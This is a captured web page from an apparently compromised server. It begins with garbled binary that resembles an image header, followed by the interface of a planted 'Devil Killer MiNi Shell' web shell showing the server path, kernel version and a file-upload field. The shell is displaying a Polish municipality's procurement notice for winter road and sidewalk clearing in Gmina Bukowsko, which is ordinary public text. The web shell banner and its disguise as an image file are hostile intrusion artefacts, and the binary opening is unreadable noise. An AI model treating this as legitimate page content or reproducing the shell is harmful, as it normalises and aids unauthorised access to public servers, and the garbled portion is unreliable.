JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230904/0037930001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Usługi związane z zimowym utrzymaniem dróg gminnych, wewnętrznych dojazdowych oraz chodników na terenie Gminy Bukowsko w sezonie zimowym 2023/2024” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Bukowsko</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Bukowsko 290</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370440732</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Bukowsko 290</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bukowsko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-505</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">134674015</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">134674466</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@bukowsko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bukowsko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Usługi związane z zimowym utrzymaniem dróg gminnych, wewnętrznych dojazdowych oraz chodników na terenie Gminy Bukowsko w sezonie zimowym 2023/2024” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-779d6bfa-4644-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00379300</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00039113/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Zimowe utrzymanie dróg na terenie Gminy Bukowsko</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bukowsko.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.bukowsko.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu platformy zakupowej https://pzp.bukowsko.pl. Szczegółowa instrukcja dla wykonawców stanowi załącznik do niniejszej SWZ.<br/>2.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na platformie zakupowej. Wykonawca posiadający konto ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji. <br/>3.	Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z platformy zakupowej pod adresem https://pzp.bukowsko.pl <br/>4.	Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z platformy zakupowej, określone w Regulaminie platformy oraz zobowiązuje się korzystając z platformy przestrzegać postanowień tego regulaminu. <br/>5.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB. <br/>6.	Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 Pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania platformę zakupową.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">www.bukowsko.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1.	administratorem Pani/Pana danych osobowych jest Wójt Gminy Bukowsko, 38-505 Bukowsko 290 tel: 0134674015, fax: 134674466.<br/>2.	inspektorem ochrony danych osobowych w Gminie Bukowsko jest Pan Krzysztof Szałankiewicz: iod@bukowsko.pl, tel: 134674015*;<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego pn.: „Zimowe utrzymanie dróg gminnych, wewnętrznych dojazdowych oraz chodników na terenie gminy Bukowsko w sezonie zimowym 2023/2024”.<br/>Nr sprawy: GR.271.7.2023 oraz zawarcia umowy na to zadanie a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywających na Zamawiającym;<br/>3.	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy pzp; <br/>4.	Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia realizacji zamówienia publicznego, a jeżeli czas realizacji zamówienia przekracza 4 lat, okres przechowywania obejmuje cały czas trwania umowy;<br/>5.	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.; <br/>6.	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>7.	posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8. nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GR.271.7.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">13</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 1 – obręb Bukowsko<br/>	Drogi:<br/>1.	Górny koniec - dz. nr ewid. 1097, 1085, 1076/4 – 835m<br/>2.	Górny koniec do obór - dz. nr ewid. 1088, 1112, 1113 i 28 (Wola Piotrowa) - 1000m<br/>3.	k/ Ćwiąkały, Łuszcza - dz. nr ewid. 1149, 1146, 1147/1 – 485m<br/>4.	k/ Pleśniarskiego - dz. nr ewid. 2237,2231/2 – 140m<br/>5.	k/ Kamyka - dz. nr ewid. 799, 2796 – 120m<br/>6.	k/ Cieśli i Czapli - dz. nr ewid. 820 – 125m<br/>7.	Klepiatówka - dz. nr ewid. 2137, 2209 – 630m <br/>8.	Wygon – dz. nr ewid. 2196/3, 2103, 2203 – 445m<br/>9.	Nędze Łazy - dz. nr ewid. 1571/3, 1905, 1910, 1944 – 2485m<br/>10.	Koło p. Motyki i do p. Kropiewnickiego - dz. nr ewid. 2786 – 225m <br/>11.	k/ Klepczyk i Kutiak - dz. nr ewid. 2470, 2467, 2473 – 245m<br/>12.	k/ Podgórskiego - dz. nr ewid. 386, 781 – 245m<br/>13.	Do stadionu, do tartaku- dz. nr ewid. 1058, 1088 – 570m<br/>14.	Nędze, Łazy k/ Bednarza - dz. nr ewid. 1592 – 130m<br/>15.	Nędze, Łazy k/Żytki - dz. nr ewid. 1585 – 135m<br/>16.	Nędze, Łazy k/Pastuszaka – dz. nr ewid. 1596 – 90m<br/>17.	Nędze, Łazy k/Duduś – dz. nr ewid. 1605/1 – 75m<br/>18.	Do p. Rakoczy i p. Radożycki - dz. nr ewid. 1985 – 80m<br/>19.	Do p. Jakubaszek i p. Wyciszkiewicz - dz. nr ewid. 376 – 110m<br/>20.	Do p. Kamyk - dz. nr ewid. 2259/1, 2243 – 300m<br/>21.	Do p. Łuszcz B.- dz. nr ewid. 832 – 115m<br/>22.	Do p. Łuszcz M. - dz. nr ewid. 2184, 2187 – 180m<br/>23.	Do p. Łuszcz E. - dz. nr ewid. 2221/6 – 50m<br/>24.	k/p. Wolańskiego - dz. nr ewid. 2010, 2011 – 180m<br/>25.	Nędze Łazy do p. Rakoczego i Bednarczyka - dz. nr ewid. 1623, 1625, 1632, 1640 – 370m<br/>26.	Bukowsko – Sanoczki - dz. nr ewid. 158/1, 28, 288(Nagórzany) – 1190m<br/>27.	Osiedle – Sójcze Wzgórze – kalwaryjska - dz. nr ewid. 113, 229, 240, 248, 256, 260, 276, 288 – 1335m<br/>28.	Do cmentarza - dz. nr ewid. 352 – 75m<br/>29.	Do plebani - dz. nr ewid. 366 – 80m<br/>30.	Nowe osiedle - dz. nr ewid. 427, 417/2, 417/9, 417/12 – 750m<br/>31.	„Bagno” k/ Górnego - dz. nr ewid. 1389/1, 1398, 1406 – 190m<br/>32.	„Bagno” k/ Rakoczego - dz. nr ewid. 1362 – 235m<br/>33.	Naprzeciw piekarni k/ Kowalika do Kseniaka - dz. nr ewid. 1296, 1275 – 655m<br/>34.	k/ Heliński - dz. nr ewid. 1370 – 285m<br/>35.	k/ Malmura do Fedorońków - dz. nr ewid. 1325, 1577 – 355m<br/>36.	k/Ośrodek Zdrowia, Bank , Szkoła Podstawowa do cmentarza, Urząd Gminy - dz. nr ewid. 362, 361, 359/1, 359/2, 357 – 310m<br/>37.	Do p. Raka, p. Kowalika (tartak) - dz. nr ewid. 68 – 160m<br/>38.	Do p. Dusznik - dz. nr ewid. 52 – 185m<br/>39.	Do p. Klimka i p. Oleksów - dz. nr ewid. 322, 332 – 205m<br/>40.	Do p. Oleksów (z drogi powiatowej) - dz. nr ewid. 307 – 125m<br/>41.	Do p. Betleja (z drogi powiatowej) - dz. nr ewid. 1178 – 30m<br/>42.	Do Zakładu P. Pogórskiego dz. nr ewid. 420, 416, 387 – 615m<br/>43.	Do P. Stawarczyka dz. nr ewid. 814 – 35m<br/>44.	Do p. Biłasa dz. nr ewid. 1564 – 35m<br/>45.	Do p. Rakoczego dz. nr ewid. 167 (Wolica) – 65m<br/><br/>Parkingi, place:<br/>1.	Parking k/Bank, Urząd Gminy, Ośrodek Zdrowia - dz. nr ewid. 359/1, 360, 2790 – 650m2<br/>2.	Plac k/GS „Sch” Bukowsko, Remizy OSP - dz. nr ewid. 2196/5, 2196/3, 2196/13 – 1250m2<br/>3.	Parkingi k/Szkoły - dz. nr ewid. 2779/3 – 1300m2<br/>4.	Parking k/Poczty - dz. nr ewid. 2779/3 – 100m2<br/><br/><br/>Chodniki:<br/>1.	Chodniki – 2660m<br/><br/>SUMA: drogi – 16280m, chodniki – 2660m, parkingi/place – 4000m2 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Zaoferowana cena przedstawiona w ofercie obejmuje sumę zadań I, II i III w danym obrębie:<br/>I.	Koszt odśnieżanie dróg = ilość km x stawka w zł brutto/km<br/>II.	Koszt odśnieżania chodników = ilość km x stawka w zł brutto/km<br/>III.	Koszt odśnieżania parkingów/placów = ilość m2 x stawka w zł brutto/m2</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 2 – obręb Dudyńce<br/>	Drogi:<br/>1.	Dudyńce wieś od Dom Ludowy do p. Szałajki - dz. nr ewid. 201/4, 201/5, 202/4 – 1410m<br/>2.	Do kościoła - dz. nr ewid. 414, 304/2, 409/3 – 425m<br/>3.	Koło stadionu w kierunku Pielni - dz. nr ewid. 260, 9/13, 9/11, 9/8, 9/6, 341/2, 339/2 – 1200m<br/>4.	Do p. Żubryka - dz. nr ewid. 194 – 200m<br/>5.	Do p. T. Rolnik - dz. nr ewid. 251 – 75m<br/>6.	Dojazd do sklepu - dz. nr ewid. 207/3, 102/7 – 50m<br/>Parkingi:<br/>1.	Parking k/Kościoła* - dz. nr ewid 207/3, 102/7 – 1000m2<br/><br/>SUMA: drogi – 3360m, parkingi – 1000m2<br/>*UWAGA: Parking k/Kościoła odśnieżany wyłącznie w niedzielę i święta lub na polecenie sołtysa. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Zaoferowana cena przedstawiona w ofercie obejmuje sumę zadań I, II i III w danym obrębie:<br/>I.	Koszt odśnieżanie dróg = ilość km x stawka w zł brutto/km<br/>II.	Koszt odśnieżania chodników = ilość km x stawka w zł brutto/km<br/>III.	Koszt odśnieżania parkingów/placów = ilość m2 x stawka w zł brutto/m2</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 3 – obręb Karlików<br/>Drogi:<br/>1.	Do składowiska odpadów* - dz. nr ewid. 2759(Bukowsko), 2/21 – 1370m<br/>2.	Karlików - Przybyszów - dz. nr ewid. 389 (Karlików), 4 (Przybyszów) – 1965m<br/>3.	Bloki drogi główne + do garaży - dz. nr ewid. 15/60, 15/63, 15/66 – 300m<br/>4.	Bloki - Dom Ludowy do obór P. Winiarza - dz. nr ewid. 387 – 250m<br/><br/>SUMA: drogi – 3885m<br/>*UWAGA: Droga do składowiska odpadów odśnieżana tylko na polecenie pracownika Urzędu Gminy Bukowsko. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">2.	Zaoferowana cena przedstawiona w ofercie obejmuje sumę zadań I, II i III w danym obrębie:<br/>I.	Koszt odśnieżanie dróg = ilość km x stawka w zł brutto/km<br/>II.	Koszt odśnieżania chodników = ilość km x stawka w zł brutto/km<br/>III.	Koszt odśnieżania parkingów/placów = ilość m2 x stawka w zł brutto/m2</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span 